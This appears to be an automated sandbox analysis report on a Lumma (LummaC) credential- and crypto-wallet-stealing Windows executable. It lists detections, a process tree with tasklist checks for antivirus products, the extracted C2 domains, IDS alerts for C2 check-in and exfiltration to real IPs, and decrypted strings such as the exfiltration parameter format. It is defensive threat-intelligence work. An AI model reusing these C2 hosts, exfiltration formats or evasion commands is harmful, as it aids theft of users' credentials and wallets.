Edit tour

Windows Analysis Report
qnUFsmyxMm.exe

Overview

General Information

Sample name:	qnUFsmyxMm.exe renamed because original name is a hash value
Original sample name:	a00f1411626bdf8860a00a2ee9f77709.exe
Analysis ID:	1583036
MD5:	a00f1411626bdf8860a00a2ee9f77709
SHA1:	cf1dca091b73e2c9fd8528a90cb66a68d7ddd744
SHA256:	39b753a793c07fe13d25dcb2e429cdadb40880fe3b86480a899f4898aaa2f1b6
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample or dropped binary is a compiled AutoHotkey binary

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

qnUFsmyxMm.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\qnUFsmyxMm.exe" MD5: A00F1411626BDF8860A00A2EE9F77709)

GWFNGPZJFQA2LD103N7W76JNMRKLK.exe (PID: 5588 cmdline: "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" MD5: C89C55FE25372BFBF8B9264A647C144B)

GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp (PID: 428 cmdline: "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)

GWFNGPZJFQA2LD103N7W76JNMRKLK.exe (PID: 4436 cmdline: "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT MD5: C89C55FE25372BFBF8B9264A647C144B)

GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp (PID: 3372 cmdline: "C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)

timeout.exe (PID: 1960 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)

conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5004 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5556 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6784 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 3224 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7104 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5492 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 2232 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5236 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 2584 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 7016 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6412 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 6692 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 712 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7152 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 1356 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 1640 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1844 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

find.exe (PID: 5348 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

ColorStreamLib.exe (PID: 3940 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe" MD5: A42E953364198E087438838FD14040E7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "leeryspcieu.click", "sustainskelet.lat", "aspecteirs.lat"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000003.3868669756.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3868587610.0000000000D71000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.3858599222.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qnUFsmyxMm.exe PID: 6464	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: qnUFsmyxMm.exe PID: 6464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qnUFsmyxMm.exe PID: 6464	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.qnUFsmyxMm.exe.790000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:53:57.048510+0100	2028371	3	Unknown Traffic	192.168.2.5	49975	172.67.219.133	443	TCP
2025-01-01T16:53:58.058458+0100	2028371	3	Unknown Traffic	192.168.2.5	49976	172.67.219.133	443	TCP
2025-01-01T16:53:59.321990+0100	2028371	3	Unknown Traffic	192.168.2.5	49977	172.67.219.133	443	TCP
2025-01-01T16:54:00.998875+0100	2028371	3	Unknown Traffic	192.168.2.5	49978	172.67.219.133	443	TCP
2025-01-01T16:54:02.394749+0100	2028371	3	Unknown Traffic	192.168.2.5	49979	172.67.219.133	443	TCP
2025-01-01T16:54:04.150189+0100	2028371	3	Unknown Traffic	192.168.2.5	49980	172.67.219.133	443	TCP
2025-01-01T16:54:05.523949+0100	2028371	3	Unknown Traffic	192.168.2.5	49981	172.67.219.133	443	TCP
2025-01-01T16:54:07.689652+0100	2028371	3	Unknown Traffic	192.168.2.5	49982	172.67.219.133	443	TCP
2025-01-01T16:54:08.712519+0100	2028371	3	Unknown Traffic	192.168.2.5	49983	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:53:57.543982+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49975	172.67.219.133	443	TCP
2025-01-01T16:53:58.549335+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49976	172.67.219.133	443	TCP
2025-01-01T16:54:08.175148+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49982	172.67.219.133	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:53:57.543982+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49975	172.67.219.133	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:53:58.549335+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49976	172.67.219.133	443	TCP

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:54:09.113380+0100	2008438	1	A Network Trojan was detected	188.114.97.3	443	192.168.2.5	49983	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T16:54:04.600845+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49980	172.67.219.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: qnUFsmyxMm.exe

Avira: detected

Found malware configuration

Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "leeryspcieu.click", "sustainskelet.lat", "aspecteirs.lat"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe

ReversingLabs: Detection: 51%

Multi AV Scanner detection for submitted file

Source: qnUFsmyxMm.exe	Virustotal: Detection: 42%			Perma Link
Source: qnUFsmyxMm.exe	ReversingLabs: Detection: 34%

Sample uses string decryption to hide its real strings

Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: rapeflowwj.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: crosshuaht.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: sustainskelet.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: aspecteirs.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: energyaffai.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: necklacebudi.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: discokeyus.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: grannyejh.lat
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: leeryspcieu.click
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: - Screen Resoluton:
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 0.2.qnUFsmyxMm.exe.790000.0.unpack	String decryptor: Workgroup: -

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007A60F8 CryptUnprotectData,

0_2_007A60F8

Source: qnUFsmyxMm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49983 version: TLS 1.2

Source: qnUFsmyxMm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Admin\Workspace\1724252660\Project\Release\Project.pdb source: qnUFsmyxMm.exe, 00000000.00000003.3787196856.0000000002796000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000000.2029041591.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+2FDC4307h]	0_2_007A60F8
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+000002A3h]	0_2_007A60F8
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov esi, dword ptr [ebp-20h]	0_2_0079B922
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	0_2_007BC981
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_007C9A70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_007B3A00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then jmp ecx	0_2_007C9A00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_007BDAB4
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_007BDAB4
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h	0_2_007C6B50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_0079D338
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh	0_2_007B7380
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, ebx	0_2_007B7380
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-00000091h]	0_2_007ACC00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-4653A5D2h]	0_2_007CEC00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1795116Dh]	0_2_007CEC00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-46B5D6C4h]	0_2_007CD570
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [edx], al	0_2_007AE870
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov esi, edx	0_2_007AE870
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-39h]	0_2_007AE870
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+20CBA957h]	0_2_007A8857
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-04AB3DE7h]	0_2_007B9030
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov edi, ebx	0_2_007CE820
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh	0_2_007B70E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then jmp edx	0_2_007B309E
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_007BB950
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000098h]	0_2_007BE145
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	0_2_007BE145
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_007B8938
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	0_2_007B4120
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx ebx, bx	0_2_007B4120
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov ebx, eax	0_2_00795910
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov ebp, eax	0_2_00795910
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_007B8912
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	0_2_007BC981
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_007A59D0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+69CAA957h]	0_2_007A59D0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_007B9AF0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_007C42E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0079C377
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0079C377
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Eh]	0_2_007AD360
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_007AD360
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then add edx, eax	0_2_00798B50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov esi, edx	0_2_007CC33D
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CD330
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], E785F9BAh	0_2_007BABF8
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], E785F9BAh	0_2_007BABF8
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov edx, ecx	0_2_007993C0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_007BDAAF
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	0_2_007B43B0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00792B90
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_007BB380
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CCC70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov ecx, edi	0_2_00797460
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E785F9BAh	0_2_007C7450
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-46B5D6C4h]	0_2_007CE490
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CCD60
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00798D50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	0_2_007B4550
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+69CAA75Bh]	0_2_007A7D1A
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_007B9D1E
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx]	0_2_007B45F7
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [007D4118h]	0_2_007B4DC0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	0_2_007B8DC5
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_007BBE10
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi+69CAA6A7h]	0_2_007C76E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	0_2_00792ED0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh	0_2_007BAEB3
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CCEA0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CCF50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov eax, dword ptr [edi+10h]	0_2_007CCFE0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], E785F9BAh	0_2_007BAFDB
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_007BE784

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49982 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49980 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49975 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49975 -> 172.67.219.133:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49976 -> 172.67.219.133:443
